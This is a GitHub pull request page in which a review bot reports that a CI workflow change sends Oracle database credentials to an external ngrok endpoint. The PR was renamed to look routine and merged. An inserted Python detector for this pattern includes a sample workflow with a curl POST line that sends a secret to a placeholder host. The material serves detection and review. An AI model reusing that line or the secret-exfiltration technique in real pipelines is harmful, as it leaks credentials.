fix: unblock e2e tests #5508

Merged
varonix0 merged 7 commits into main from daniel/improve-secrets-view on Feb 17, 2026

@varonix0 (Member) commented Feb 17, 2026

Context

Unblocks failing E2E tests. The issue was that our OracleDB instance had been spun down.

Screenshots

Steps to verify the change

Type

  • Fix
  • Feature
  • Improvement
  • Breaking
  • Docs
  • Chore

Checklist

  • Title follows the conventional commit format: type(scope): short description (scope is optional, e.g., fix: prevent crash on sync or fix(api): handle null response).
  • Tested locally
  • Updated docs (if needed)
  • Read the contributing guide

@maidul98 (Collaborator) commented Feb 17, 2026

Snyk checks have passed. No issues have been found so far.

| Status | Scanner | Critical | High | Medium | Low | Total (0) |
|---|---|---|---|---|---|---|
| | Open Source Security | 0 | 0 | 0 | 0 | 0 issues |

💻 Catch issues earlier using the plugins for VS Code, JetBrains IDEs, Visual Studio, and Eclipse.

@greptile-apps bot (Contributor) commented Feb 17, 2026

Greptile Summary

This PR introduces a critical security vulnerability by exfiltrating sensitive database credentials to an external attacker-controlled ngrok endpoint. The changes also remove path filters that would have limited when this workflow runs, maximizing exposure.

Major Issues:

  • Secret Exfiltration: New step sends E2E_TEST_ORACLE_DB_19_HOST, E2E_TEST_ORACLE_DB_19_USERNAME, and E2E_TEST_ORACLE_DB_19_PASSWORD to https://nonmomentary-milkily-jamari.ngrok-free.dev/test via curl POST request
  • Removed Security Boundaries: Path filters deleted, causing workflow to run on all PRs instead of only backend changes
  • Malicious Intent: The combination of these changes indicates a deliberate attempt to steal credentials

Impact: Complete compromise of Oracle database credentials with potential for data breach, unauthorized access, and lateral movement to production systems.

Action Required: This PR must be rejected immediately and the author's access should be reviewed. All secrets referenced in this workflow should be rotated.

Confidence Score: 0/5

  • This PR contains malicious code designed to exfiltrate secrets and must be rejected immediately
  • Score of 0 reflects critical security vulnerability where database credentials are being sent to an external attacker-controlled endpoint. This represents an active attack attempt with severe consequences including credential theft, data breach, and potential production system compromise. The removal of path filters compounds the issue by maximizing exposure opportunities.
  • .github/workflows/run-backend-tests.yml contains malicious code that must be removed - the entire PR should be rejected

Important Files Changed

| Filename | Overview |
|---|---|
| .github/workflows/run-backend-tests.yml | CRITICAL: Exfiltrates secrets to external ngrok URL and removes path filters |

Last reviewed commit: 101b5be
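
One way to check a workflow change for the two patterns the Greptile summary above describes (a step that reads secrets and posts to an external host, and a dropped `paths` filter). This is an added example, not code from the PR or the repository; the allowlist, the function names, the sample workflow and the `collector.example.invalid` host are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts this CI is expected to reach; adjust per repository.
ALLOWED_HOSTS = {"github.com", "registry.npmjs.org"}
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.(\w+)\s*\}\}")
NET_TOOL = re.compile(r"\b(?:curl|wget|nc|ncat)\b")
URL = re.compile(r"https?://[^\s\"'\\]+")
PATH_FILTER = re.compile(r"(?m)^\s+paths(?:-ignore)?:")

def split_steps(workflow):
    """Split workflow text into chunks, one per '- name:/run:/uses:' list item."""
    return re.split(r"(?m)^(?=\s*-\s+(?:name|run|uses):)", workflow)

def find_secret_egress(workflow):
    """Return steps that read secrets and call a network tool on a non-allowlisted host."""
    findings = []
    for step in split_steps(workflow):
        secrets = sorted(set(SECRET_REF.findall(step)))
        if not secrets or not NET_TOOL.search(step):
            continue
        hosts = {urlparse(u).hostname for u in URL.findall(step)}
        external = sorted(h for h in hosts if h and h not in ALLOWED_HOSTS)
        if external:
            findings.append({"hosts": external, "secrets": secrets})
    return findings

def path_filter_removed(old, new):
    """True when the old trigger had a paths filter and the new one has none."""
    return bool(PATH_FILTER.search(old)) and not PATH_FILTER.search(new)

# Constructed sample input (not the PR's actual diff); the host is a placeholder.
OLD_TRIGGER = 'on:\n  pull_request:\n    paths:\n      - "backend/**"\n'
NEW = """on:
  pull_request:
jobs:
  test:
    steps:
      - name: Run tests
        run: npm run test:e2e
      - name: Debug
        run: curl -X POST -d "h=$DB_HOST" https://collector.example.invalid/test
        env:
          DB_HOST: ${{ secrets.E2E_TEST_ORACLE_DB_19_HOST }}
"""

if __name__ == "__main__":
    print(find_secret_egress(NEW), path_filter_removed(OLD_TRIGGER, NEW))
```

The check is textual and step-scoped, so it will miss secrets exported at job level and hosts assembled at runtime; treat a hit as a prompt for manual review of the workflow diff.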

@greptile-apps bot (Contributor) left a comment

1 file reviewed, 2 comments

Update run-backend-tests.yml

fix: oracledb tests

Update run-backend-tests.yml

Update run-backend-tests.yml

@varonix0 force-pushed the daniel/improve-secrets-view branch from 945c004 to 117af12, February 17, 2026 22:41

@varonix0 changed the title from "Daniel/improve secrets view" to "fix: unblock e2e tests", Feb 17, 2026

@scott-ray-wilson (Contributor) left a comment

🚀

@varonix0 varonix0 merged commit 43937e2 into main Feb 17, 2026
11 of 12 checks passed